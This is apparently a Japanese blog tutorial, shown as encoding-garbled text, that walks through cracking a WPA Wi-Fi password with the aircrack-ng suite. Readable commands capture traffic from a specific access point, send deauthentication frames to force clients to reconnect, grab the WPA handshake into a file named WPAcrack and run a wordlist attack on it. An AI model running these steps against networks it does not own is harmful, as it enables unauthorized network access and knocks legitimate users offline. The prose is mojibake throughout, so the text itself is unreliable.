¸½ºß¡¢»ä¤¿¤Á¤Î¥ï¥¤¥ä¥ì¥¹¥¢¥À¥×¥¿¤¬¥â¥Ë¥¿¥â¡¼¥É¤Ë¤Ê¤Ã¤Æ¤¤¤ë¤³¤È¤ò¡¢»ä¤¿¤Á¤Ï¡¢¶õµ¤Ãæ¤òÄ̲᤹¤ë¤¹¤Ù¤Æ¤Î̵Àþ¥È¥é¥Õ¥£¥Ã¥¯¤ò»²¾È¤¹¤ëµ¡Ç½¤ò»ý¤Ã¤Æ¤¤¤ë¡£»ä¤¿¤Á¤Ï¡¢¤½¤Î¥È¥é¥Õ¥£¥Ã¥¯¤ò¤Ä¤«¤à¤³¤È¤¬¤Ç¤­¤ë¡¢airodump-ng¥³¥Þ¥ó¥É¤ò»ÈÍѤ·¤Þ¤¹¡£

airodump-ng¡¦¡¦¡¦¥Ñ¥±¥Ã¥È¥¹¥Ë¥Õ¥¡¡§PCAP¤Þ¤¿¤ÏIVS¥Õ¥¡¥¤¥ë¤Ë¹Ò¶õ¸òÄ̤ξì½ê¤ä¥Í¥Ã¥È¥ï¡¼       ¥¯¤Ë´Ø¤¹¤ë¾ðÊó¤ò¼¨¤¹

¤³¤Î¥³¥Þ¥ó¥É¤Ï¡¢¤¢¤Ê¤¿¤Î¥ï¥¤¥ä¥ì¥¹¥¢¥À¥×¥¿¡¼¤¬¸«¤ë¤³¤È¤¬¤Ç¤­¤ë¤¹¤Ù¤Æ¤Î¥È¥é¥Õ¥£¥Ã¥¯¤ò¤Ä¤«¤ó¤Ç¡¢BSSID¡ÊAP¤ÎMAC¥¢¥É¥ì¥¹¡Ë¡¢ÅŸ»¡¢Â¿¤¯¤Î¥Ó¡¼¥³¥ó¥Õ¥ì¡¼¥à¡¢Â¿¤¯¤Î¥Ç¡¼¥¿¥Õ¥ì¡¼¥à¡¢¥Á¥ã¥ó¥Í¥ë¡¢Â®ÅÙ¡¢°Å¹æ²½¡¢ESSID¡Ê²æ¡¹¤Î¤Û¤È¤ó¤É¤¬SSID¤È¾Î¤¹¤ë¤â¤Î¡Ë¤ò´Þ¤à¤½¤ì¤Ë´Ø¤¹¤ë½ÅÍפʾðÊó¤ò¼¨¤·¤Þ¤¹¡£
¤½¤ì¤Ç¤Ï¼¡¤Î¤è¤¦¤ËÆþÎϤ·¤Æ¤³¤ì¤ò¤ä¤Ã¤Æ¤ß¤Þ¤·¤ç¤¦¡§
  • airodump-ng MON0
²Ä»ëAP¤Î¤¹¤Ù¤Æ¤ËÃí°Õ¤·¤Æ¡¢²èÌ̤ξåÉô¤Ëµ­ºÜ¤µ¤ì¤Æ¤¤¤ë¥¯¥é¥¤¥¢¥ó¥È¤Ï¡¢²èÌ̤β¼Éô¤Ëµ­ºÜ¤µ¤ì¤Æ¤¤¤Þ¤¹¡£

¥¹¥Æ¥Ã¥×3¡§¥Á¥ã¥ó¥Í¥ë¾å¤ÎAP¾å¤Î¾ÇÅÀAirodump-ng

»ä¤¿¤Á¤Î¼¡¤Î¥¹¥Æ¥Ã¥×¤Ï¡¢1¥Á¥ã¥ó¥Í¥ë¤Ç¡¢1¤ÎAP¤ËÎϤò½¸Ã椷¡¢¤½¤³¤«¤é½ÅÍפʥǡ¼¥¿¤òÊ᪤¹¤ë¤³¤È¤Ç¤¢¤ë¡£»ä¤¿¤Á¤Ï¡¢¤³¤ì¤ò¹Ô¤¦¤¿¤á¤ÎBSSID¤ª¤è¤Ó¥Á¥ã¥Í¥ë¤òɬÍפȤ·¤Æ¤¤¤Þ¤¹¡£¤Î¾¤ÎüËö¤È·¿¤ò³«¤¤¤Æ¤ß¤Þ¤·¤ç¤¦¡§
  • airodump-ng 08 --bssid¡§86¡§30¡§74¡§22¡§76 C 6 --write WPAcrack MON0
  • 08¡§86¡§30¡§74¡§22¡§76¡¦¡¦¡¦AP¤ÎBSSID¤Ç¤¢¤ë
  • C 6¡¦¡¦¡¦¡¦¡¦¡¦¡¦¡¦¡¦¡¦¡¦¡¦¡¦¡¦¡¦¡¦ AP¤¬¾å¤Çưºî¤·¤Æ¤¤¤ë¥Á¥ã¥ó¥Í¥ë¤Ç¤¢¤ë
  • WPAcrack¡¦¡¦¡¦¡¦¡¦¡¦¡¦¡¦¡¦¡¦¤¢¤Ê¤¿¤¬½ñ¤­¤¿¤¤¥Õ¥¡¥¤¥ë¤Ç¤¢¤ë
  • MON0¡¦¡¦¡¦¡¦¡¦¡¦¡¦¡¦¡¦¡¦¡¦¡¦¡¦´Æ»ë¥ï¥¤¥ä¥ì¥¹¥¢¥À¥×¥¿
¤¢¤Ê¤¿¤Ï¾å¤Î¥¹¥¯¥ê¡¼¥ó¥·¥ç¥Ã¥È¤ò¸«¤ÆÊ¬¤«¤ë¤è¤¦¤Ë¡¢»ä¤¿¤Á¤Ïº£¡¢¥Á¥ã¥Í¥ë6 Belkin276¾åBelkin276¤ÎESSID¤ò1 AP¤«¤é¤Î¥Ç¡¼¥¿¤ò¼è¤ê¹þ¤à¤Ë¾ÇÅÀ¤òÅö¤Æ¤Æ¤¤¤ë¤Î¤Ï¡¢¤ª¤½¤é¤¯»Ä¤·¥æ¡¼¥¶¡¼¤È¥ï¥¤¥ä¥ì¥¹¥Ï¥Ã¥­¥ó¥°¤Î¤¿¤á¤Î¼ç¤Ê¥¿¡¼¥²¥Ã¥È¤Ç¤¢¤ë¥Ç¥Õ¥©¥ë¥È¤ÎSSID¤Ç¤¢¤ê¡¢¥Ç¥Õ¥©¥ë¥È¤ÎESSID¤Ç¤ÏÄ̾AP¤Î³ÎÊݤË¿¤¯¤ÎÅØÎϤòÈñ¤ä¤¹¤³¤È¤Ï¤¢¤ê¤Þ¤»¤ó¡£

¥¹¥Æ¥Ã¥×4¡§Aireplay-NGǧ¾Ú²ò½ü

°Å¹æ²½¤µ¤ì¤¿¥Ñ¥¹¥ï¡¼¥É¤ò¥­¥ã¥×¥Á¥ã¤¹¤ë¤¿¤á¤Ë¡¢»ä¤¿¤Á¤Ï¡¢AP¤ËÂФ·¤Æ¥¯¥é¥¤¥¢¥ó¥Èǧ¾Ú¤ò»ý¤Ã¤Æ¤¤¤ëɬÍפ¬¤¢¤ê¤Þ¤¹¡£Èà¤é¤¬¤¹¤Ç¤Ëǧ¾Ú¤·¤Æ¤¤¤ë¾ì¹ç¤Ï¡¢»ä¤¿¤Á¤Ï¡Ê¤½¤ì¤é¤ò¥­¥Ã¥¯¥ª¥Õ¡Ë¡¢¤½¤ì¤é¤ò²ò½üǧ¾Ú¤¹¤ë¤³¤È¤¬¤Ç¤­¡¢¤½¤ì¤é¤Î¥·¥¹¥Æ¥à¤¬¼«Æ°Åª¤Ë»ä¤¿¤Á¤Ï¤½¤Î²áÄø¤Ç°Å¹æ²½¤µ¤ì¤¿¥Ñ¥¹¥ï¡¼¥É¤ò¤Ä¤«¤à¤³¤È¤¬¤Ç¤­¡¢ºÆÇ§¾Ú¤·¤Þ¤¹¡£¤Î¾¤ÎüËö¤È·¿¤ò³«¤¤¤Æ¤ß¤Þ¤·¤ç¤¦¡§
  • aireplay-ng¡¡--deauth 100 -a 08¡§86¡§30¡§74¡§22¡§76 MON0
  • 100¡¦¡¦¡¦¡¦¡¦¡¦¡¦¡¦¡¦¡¦¡¦¡¦¡¦¡¦¡¦¡¦Á÷¿®¤·¤¿¤¤¥Çǧ¾Ú¤¹¤ë¥Õ¥ì¡¼¥à¿ô¤Ç¤¹
  • 08¡§86¡§30¡§74¡§22¡§76¡¦¡¦¡¦AP¤ÎBSSID¤Ç¤¢¤ë
  • MON0¡¦¡¦¡¦¡¦¡¦¡¦¡¦¡¦¡¦¡¦¡¦¡¦¡¦¡¦´Æ»ë¥ï¥¤¥ä¥ì¥¹¥¢¥À¥×¥¿¤Ç¤¹

¥¹¥Æ¥Ã¥×5¡§¥Ï¥ó¥É¥·¥§¥¤¥¯¤ò¥­¥ã¥×¥Á¥ã

Á°¤Î¥¹¥Æ¥Ã¥×¤Ç¤Ï¡¢¼«Ê¬¤ÎAP¤ò¥ª¥Õ¤Ë¥æ¡¼¥¶¡¼¤ò¥Ð¥¦¥ó¥¹¤·¡¢¤½¤ì¤é¤¬ºÆÇ§¾Ú¤¹¤ëºÝ¤Ë¡¢º£¡¢airodump-ng¤¬¿·¤·¤¤4-way handshake¤Ç¼«Ê¬¤Î¥Ñ¥¹¥ï¡¼¥É¤ò¤Ä¤«¤à¤·¤è¤¦¤È¤·¤Þ¤¹¡£»ä¤¿¤Á¤Îairodump-ng¤Î¥¿¡¼¥ß¥Ê¥ë¤ËÌá¤Ã¤Æ¡¢»ä¤¿¤Á¤¬À®¸ù¤·¤Æ¤­¤¿¤«¤É¤¦¤«¤¬³Îǧ¤·¤Æ¤ß¤Þ¤·¤ç¤¦¡£
±¦¤Ø¤Î¸«½Ð¤·¤Çairodump-ng¤¬¡ÖWPA handshake¡×¤È¸À¤Ã¤Æ¤ë¤³¤È¤Ëµ¤¤Å¤¤¤Æ¤¯¤À¤µ¤¤¡£
¤³¤ì¤Ï¡¢»ä¤¿¤Á¤¬°Å¹æ²½¤µ¤ì¤¿¥Ñ¥¹¥ï¡¼¥É¤ò¤Ä¤«¤ó¤ÇÀ®¸ù¤·¤¿¤ò¶µ¤¨¤Æ¤¯¤ì¤ëÊýË¡¤Ç¤¹¡ª¤Ä¤Þ¤ê¡¢À®¸ù¤Ø¤ÎÂè°ìÊâ¤Ç¤¹¡ª

¥¹¥Æ¥Ã¥×6¡§¥Ñ¥¹¥ï¡¼¥É¤òAircrack-ng¤·¤è¤¦¡ª

º£¥Õ¥¡¥¤¥ëWPAcrack¤Ë°Å¹æ²½¤µ¤ì¤¿¥Ñ¥¹¥ï¡¼¥É¤ò»ý¤Ä¤Î¤Ç¡¢»ä¤¿¤Á¤Ï¹¥¤ß¤Î¥Ñ¥¹¥ï¡¼¥É¥Õ¥¡¥¤¥ë¤ò»ÈÍѤ·¤Æaircrack-ng¤Ë¤½¤Î¥Õ¥¡¥¤¥ë¤ò¤Ö¤Ä¤±¤ë¤³¤È¤¬¤Ç¤­¤Þ¤¹¡£
¤³¤Î¼ï¤Î¹¶·â¤Ï¡¢¥Ñ¥¹¥ï¡¼¥É¥Õ¥¡¥¤¥ë¤ÈƱ¤¸¤¯¤é¤¤Îɹ¥¤Ç¤¢¤ë¤³¤È¤ò˺¤ì¤Ê¤¤¤Ç¤¯¤À¤µ¤¤¡£  
»ä¤ÏdarkcOde¤È¤¤¤¦Ì¾¤ÎBackTrack¤Î¾å¤Îaircrack-ng¤Ç´Þ¤Þ¤ì¤¿¥Ç¥Õ¥©¥ë¥È¥Ñ¥¹¥ï¡¼¥É¥ê¥¹¥È¤ò»ÈÍѤ·¤Þ¤¹¡£

¾¤ÎüËö¤ÈÆþÎϤò³«¤¯¤³¤È¤Ë¤è¤Ã¤Æ¡¢¥Ñ¥¹¥ï¡¼¥É¤ò²òÆÉ¤·¤Þ¤¹¡§
  • aircrack-ng WPAcrack-01.cap -w /pentest/passwords/wordlists/darkc0de
  • WPAcrack-01.cap¡¦¡¦¡¦»ä¤¿¤Á¤¬airodump-ng¤Î¥³¥Þ¥ó¥É¤ÎÃæ¤Ç¼ê»æ¤ò½ñ¤¤¤¿¥Õ¥¡¥¤¥ë¤Î̾Á°¤Ç¤¹
  •  /pentest/passwords/wordlists/darkc0dedarkc0de¡¦¡¦¡¦¥Ñ¥¹¥ï¡¼¥É¥Õ¥¡¥¤¥ë¤Ø¤ÎÀäÂХѥ¹¤Ç¤¹

¤É¤Î¤¯¤é¤¤¤«¤«¤ê¤Þ¤¹¤«¡©

¤³¤Î¥×¥í¥»¥¹¤ÏÈæ³ÓŪÃÙ¤¤¤ÈÌÌÅݤʾì¹ç¤¬¤¢¤ê¤Þ¤¹¡£¤¢¤Ê¤¿¤Ï¥Ñ¥¹¥ï¡¼¥É¥ê¥¹¥È¤ÎŤµ¤Ë±þ¤¸¤Æ¡¢¿ôÆü¡¢¿ôʬ´ÖÂÔµ¡¤¹¤ë¤³¤È¤¬¤Ç¤­¤Þ¤¹¤«¡©»ä¤Î¥Ç¥å¥¢¥ë¥³¥¢2.8¥®¥°Intel¥×¥í¥»¥Ã¥µ¾å¤Ç¤Ï¡¢ËèÉÃ500¤Î¥Ñ¥¹¥ï¡¼¥É¤ò¤ï¤º¤«¤Ëͤ¨¤ë¥Æ¥¹¥È¤Ç¤­¤ë¤Î¤Ç¤¹¡£¤Ä¤Þ¤ê¡¢Ëè»þÌó180Ëü¥Ñ¥¹¥ï¡¼¥É¤Ë¤¦¤Þ¤¯¤¤¤­¤Þ¤¹¡£¤¢¤Ê¤¿¤Î·ë²Ì¤Ï°Û¤Ê¤ê¤Þ¤¹¡£
¥Ñ¥¹¥ï¡¼¥É¤¬¸«¤Ä¤«¤Ã¤¿¾ì¹ç¤Ë¤Ï¡¢²èÌ̤Ëɽ¼¨¤µ¤ì¤Þ¤¹¡£¥Ñ¥¹¥ï¡¼¥É¥Õ¥¡¥¤¥ë¤¬Èó¾ï¤Ë½ÅÍפÀ¤È¤¤¤¦¤³¤È¤ò¤ª¤Ü¤¨¤Æ¤ª¤¤¤Æ¤¯¤À¤µ¤¤¡£

¤³¤Îµ­»ö¤Ë

³«¤¯¥³¥á¥ó¥È¡Ê0¡Ë¢¨Åê¹Æ¤µ¤ì¤¿¥³¥á¥ó¥È¤Ï¥Ö¥í¥°³«À߼ԤξµÇ§¸å¤Ë¸ø³«¤µ¤ì¤Þ¤¹¡£

³«¤¯¥È¥é¥Ã¥¯¥Ð¥Ã¥¯¡Ê0¡Ë¢¨¥È¥é¥Ã¥¯¥Ð¥Ã¥¯¤Ï¥Ö¥í¥°³«À߼ԤξµÇ§¸å¤Ë¸ø³«¤µ¤ì¤Þ¤¹¡£

[ ¤¹¤Ù¤ÆÉ½¼¨ ]

PR

 
º£Æü
Á´ÂÎ
ˬÌä¼ÔˬÌä¼Ô12932
¥Ö¥í¥°¥ê¥ó¥¯¥Ö¥í¥°¥ê¥ó¥¯00
¥³¥á¥ó¥È¥³¥á¥ó¥È00
¥È¥é¥Ã¥¯¥Ð¥Ã¥¯¥È¥é¥Ã¥¯¥Ð¥Ã¥¯00
Æü
·î
²Ð
¿å
ÌÚ
¶â
ÅÚ
1 2 3 4
5 6 7 8 9 10 11
12 13 14 15 16 17 18
19 20 21 22 23 24 25
26 27 28 29 30

¤è¤·¤â¤È¥Ö¥í¥°¥é¥ó¥­¥ó¥°

Yahoo!ͽÌó¡¡°û¿©Å¹
ËÜʸ¤Ï¤³¤³¤Þ¤Ç¤Ç¤¹¤³¤Î¥Ú¡¼¥¸¤ÎÀèÆ¬¤Ø

¤ªÆÀ¾ðÊó

Æî¥¢¥ë¥×¥¹¤ÎÅ·Á³¿å¡õ¥è¡¼¥°¥ê¡¼¥Ê¤ò
¥×¥ì¥¼¥ó¥È¡ªÃêÁª¤Ç£±£µËü̾ÍͤËÅö¤¿¤ë
¥­¥ã¥ó¥Ú¡¼¥ó¼Â»ÜÃæ¡ª
»ñÀ¸Æ²HAKU¡¿¿·ÈþÇò¥±¥¢
¿·È¯Çä¤ÎÈþÇò²½¾Ñ¿å¡¢Æý±Õ¤ò¥»¥Ã¥È¤Ç
ÃêÁª¤Ç1Ëü̾¤Ë3Æü´Ö¥µ¥ó¥×¥ë¥×¥ì¥¼¥ó¥È

¤½¤Î¾¤Î¥­¥ã¥ó¥Ú¡¼¥ó

¤ß¤ó¤Ê¤Î¹¹¿·µ­»ö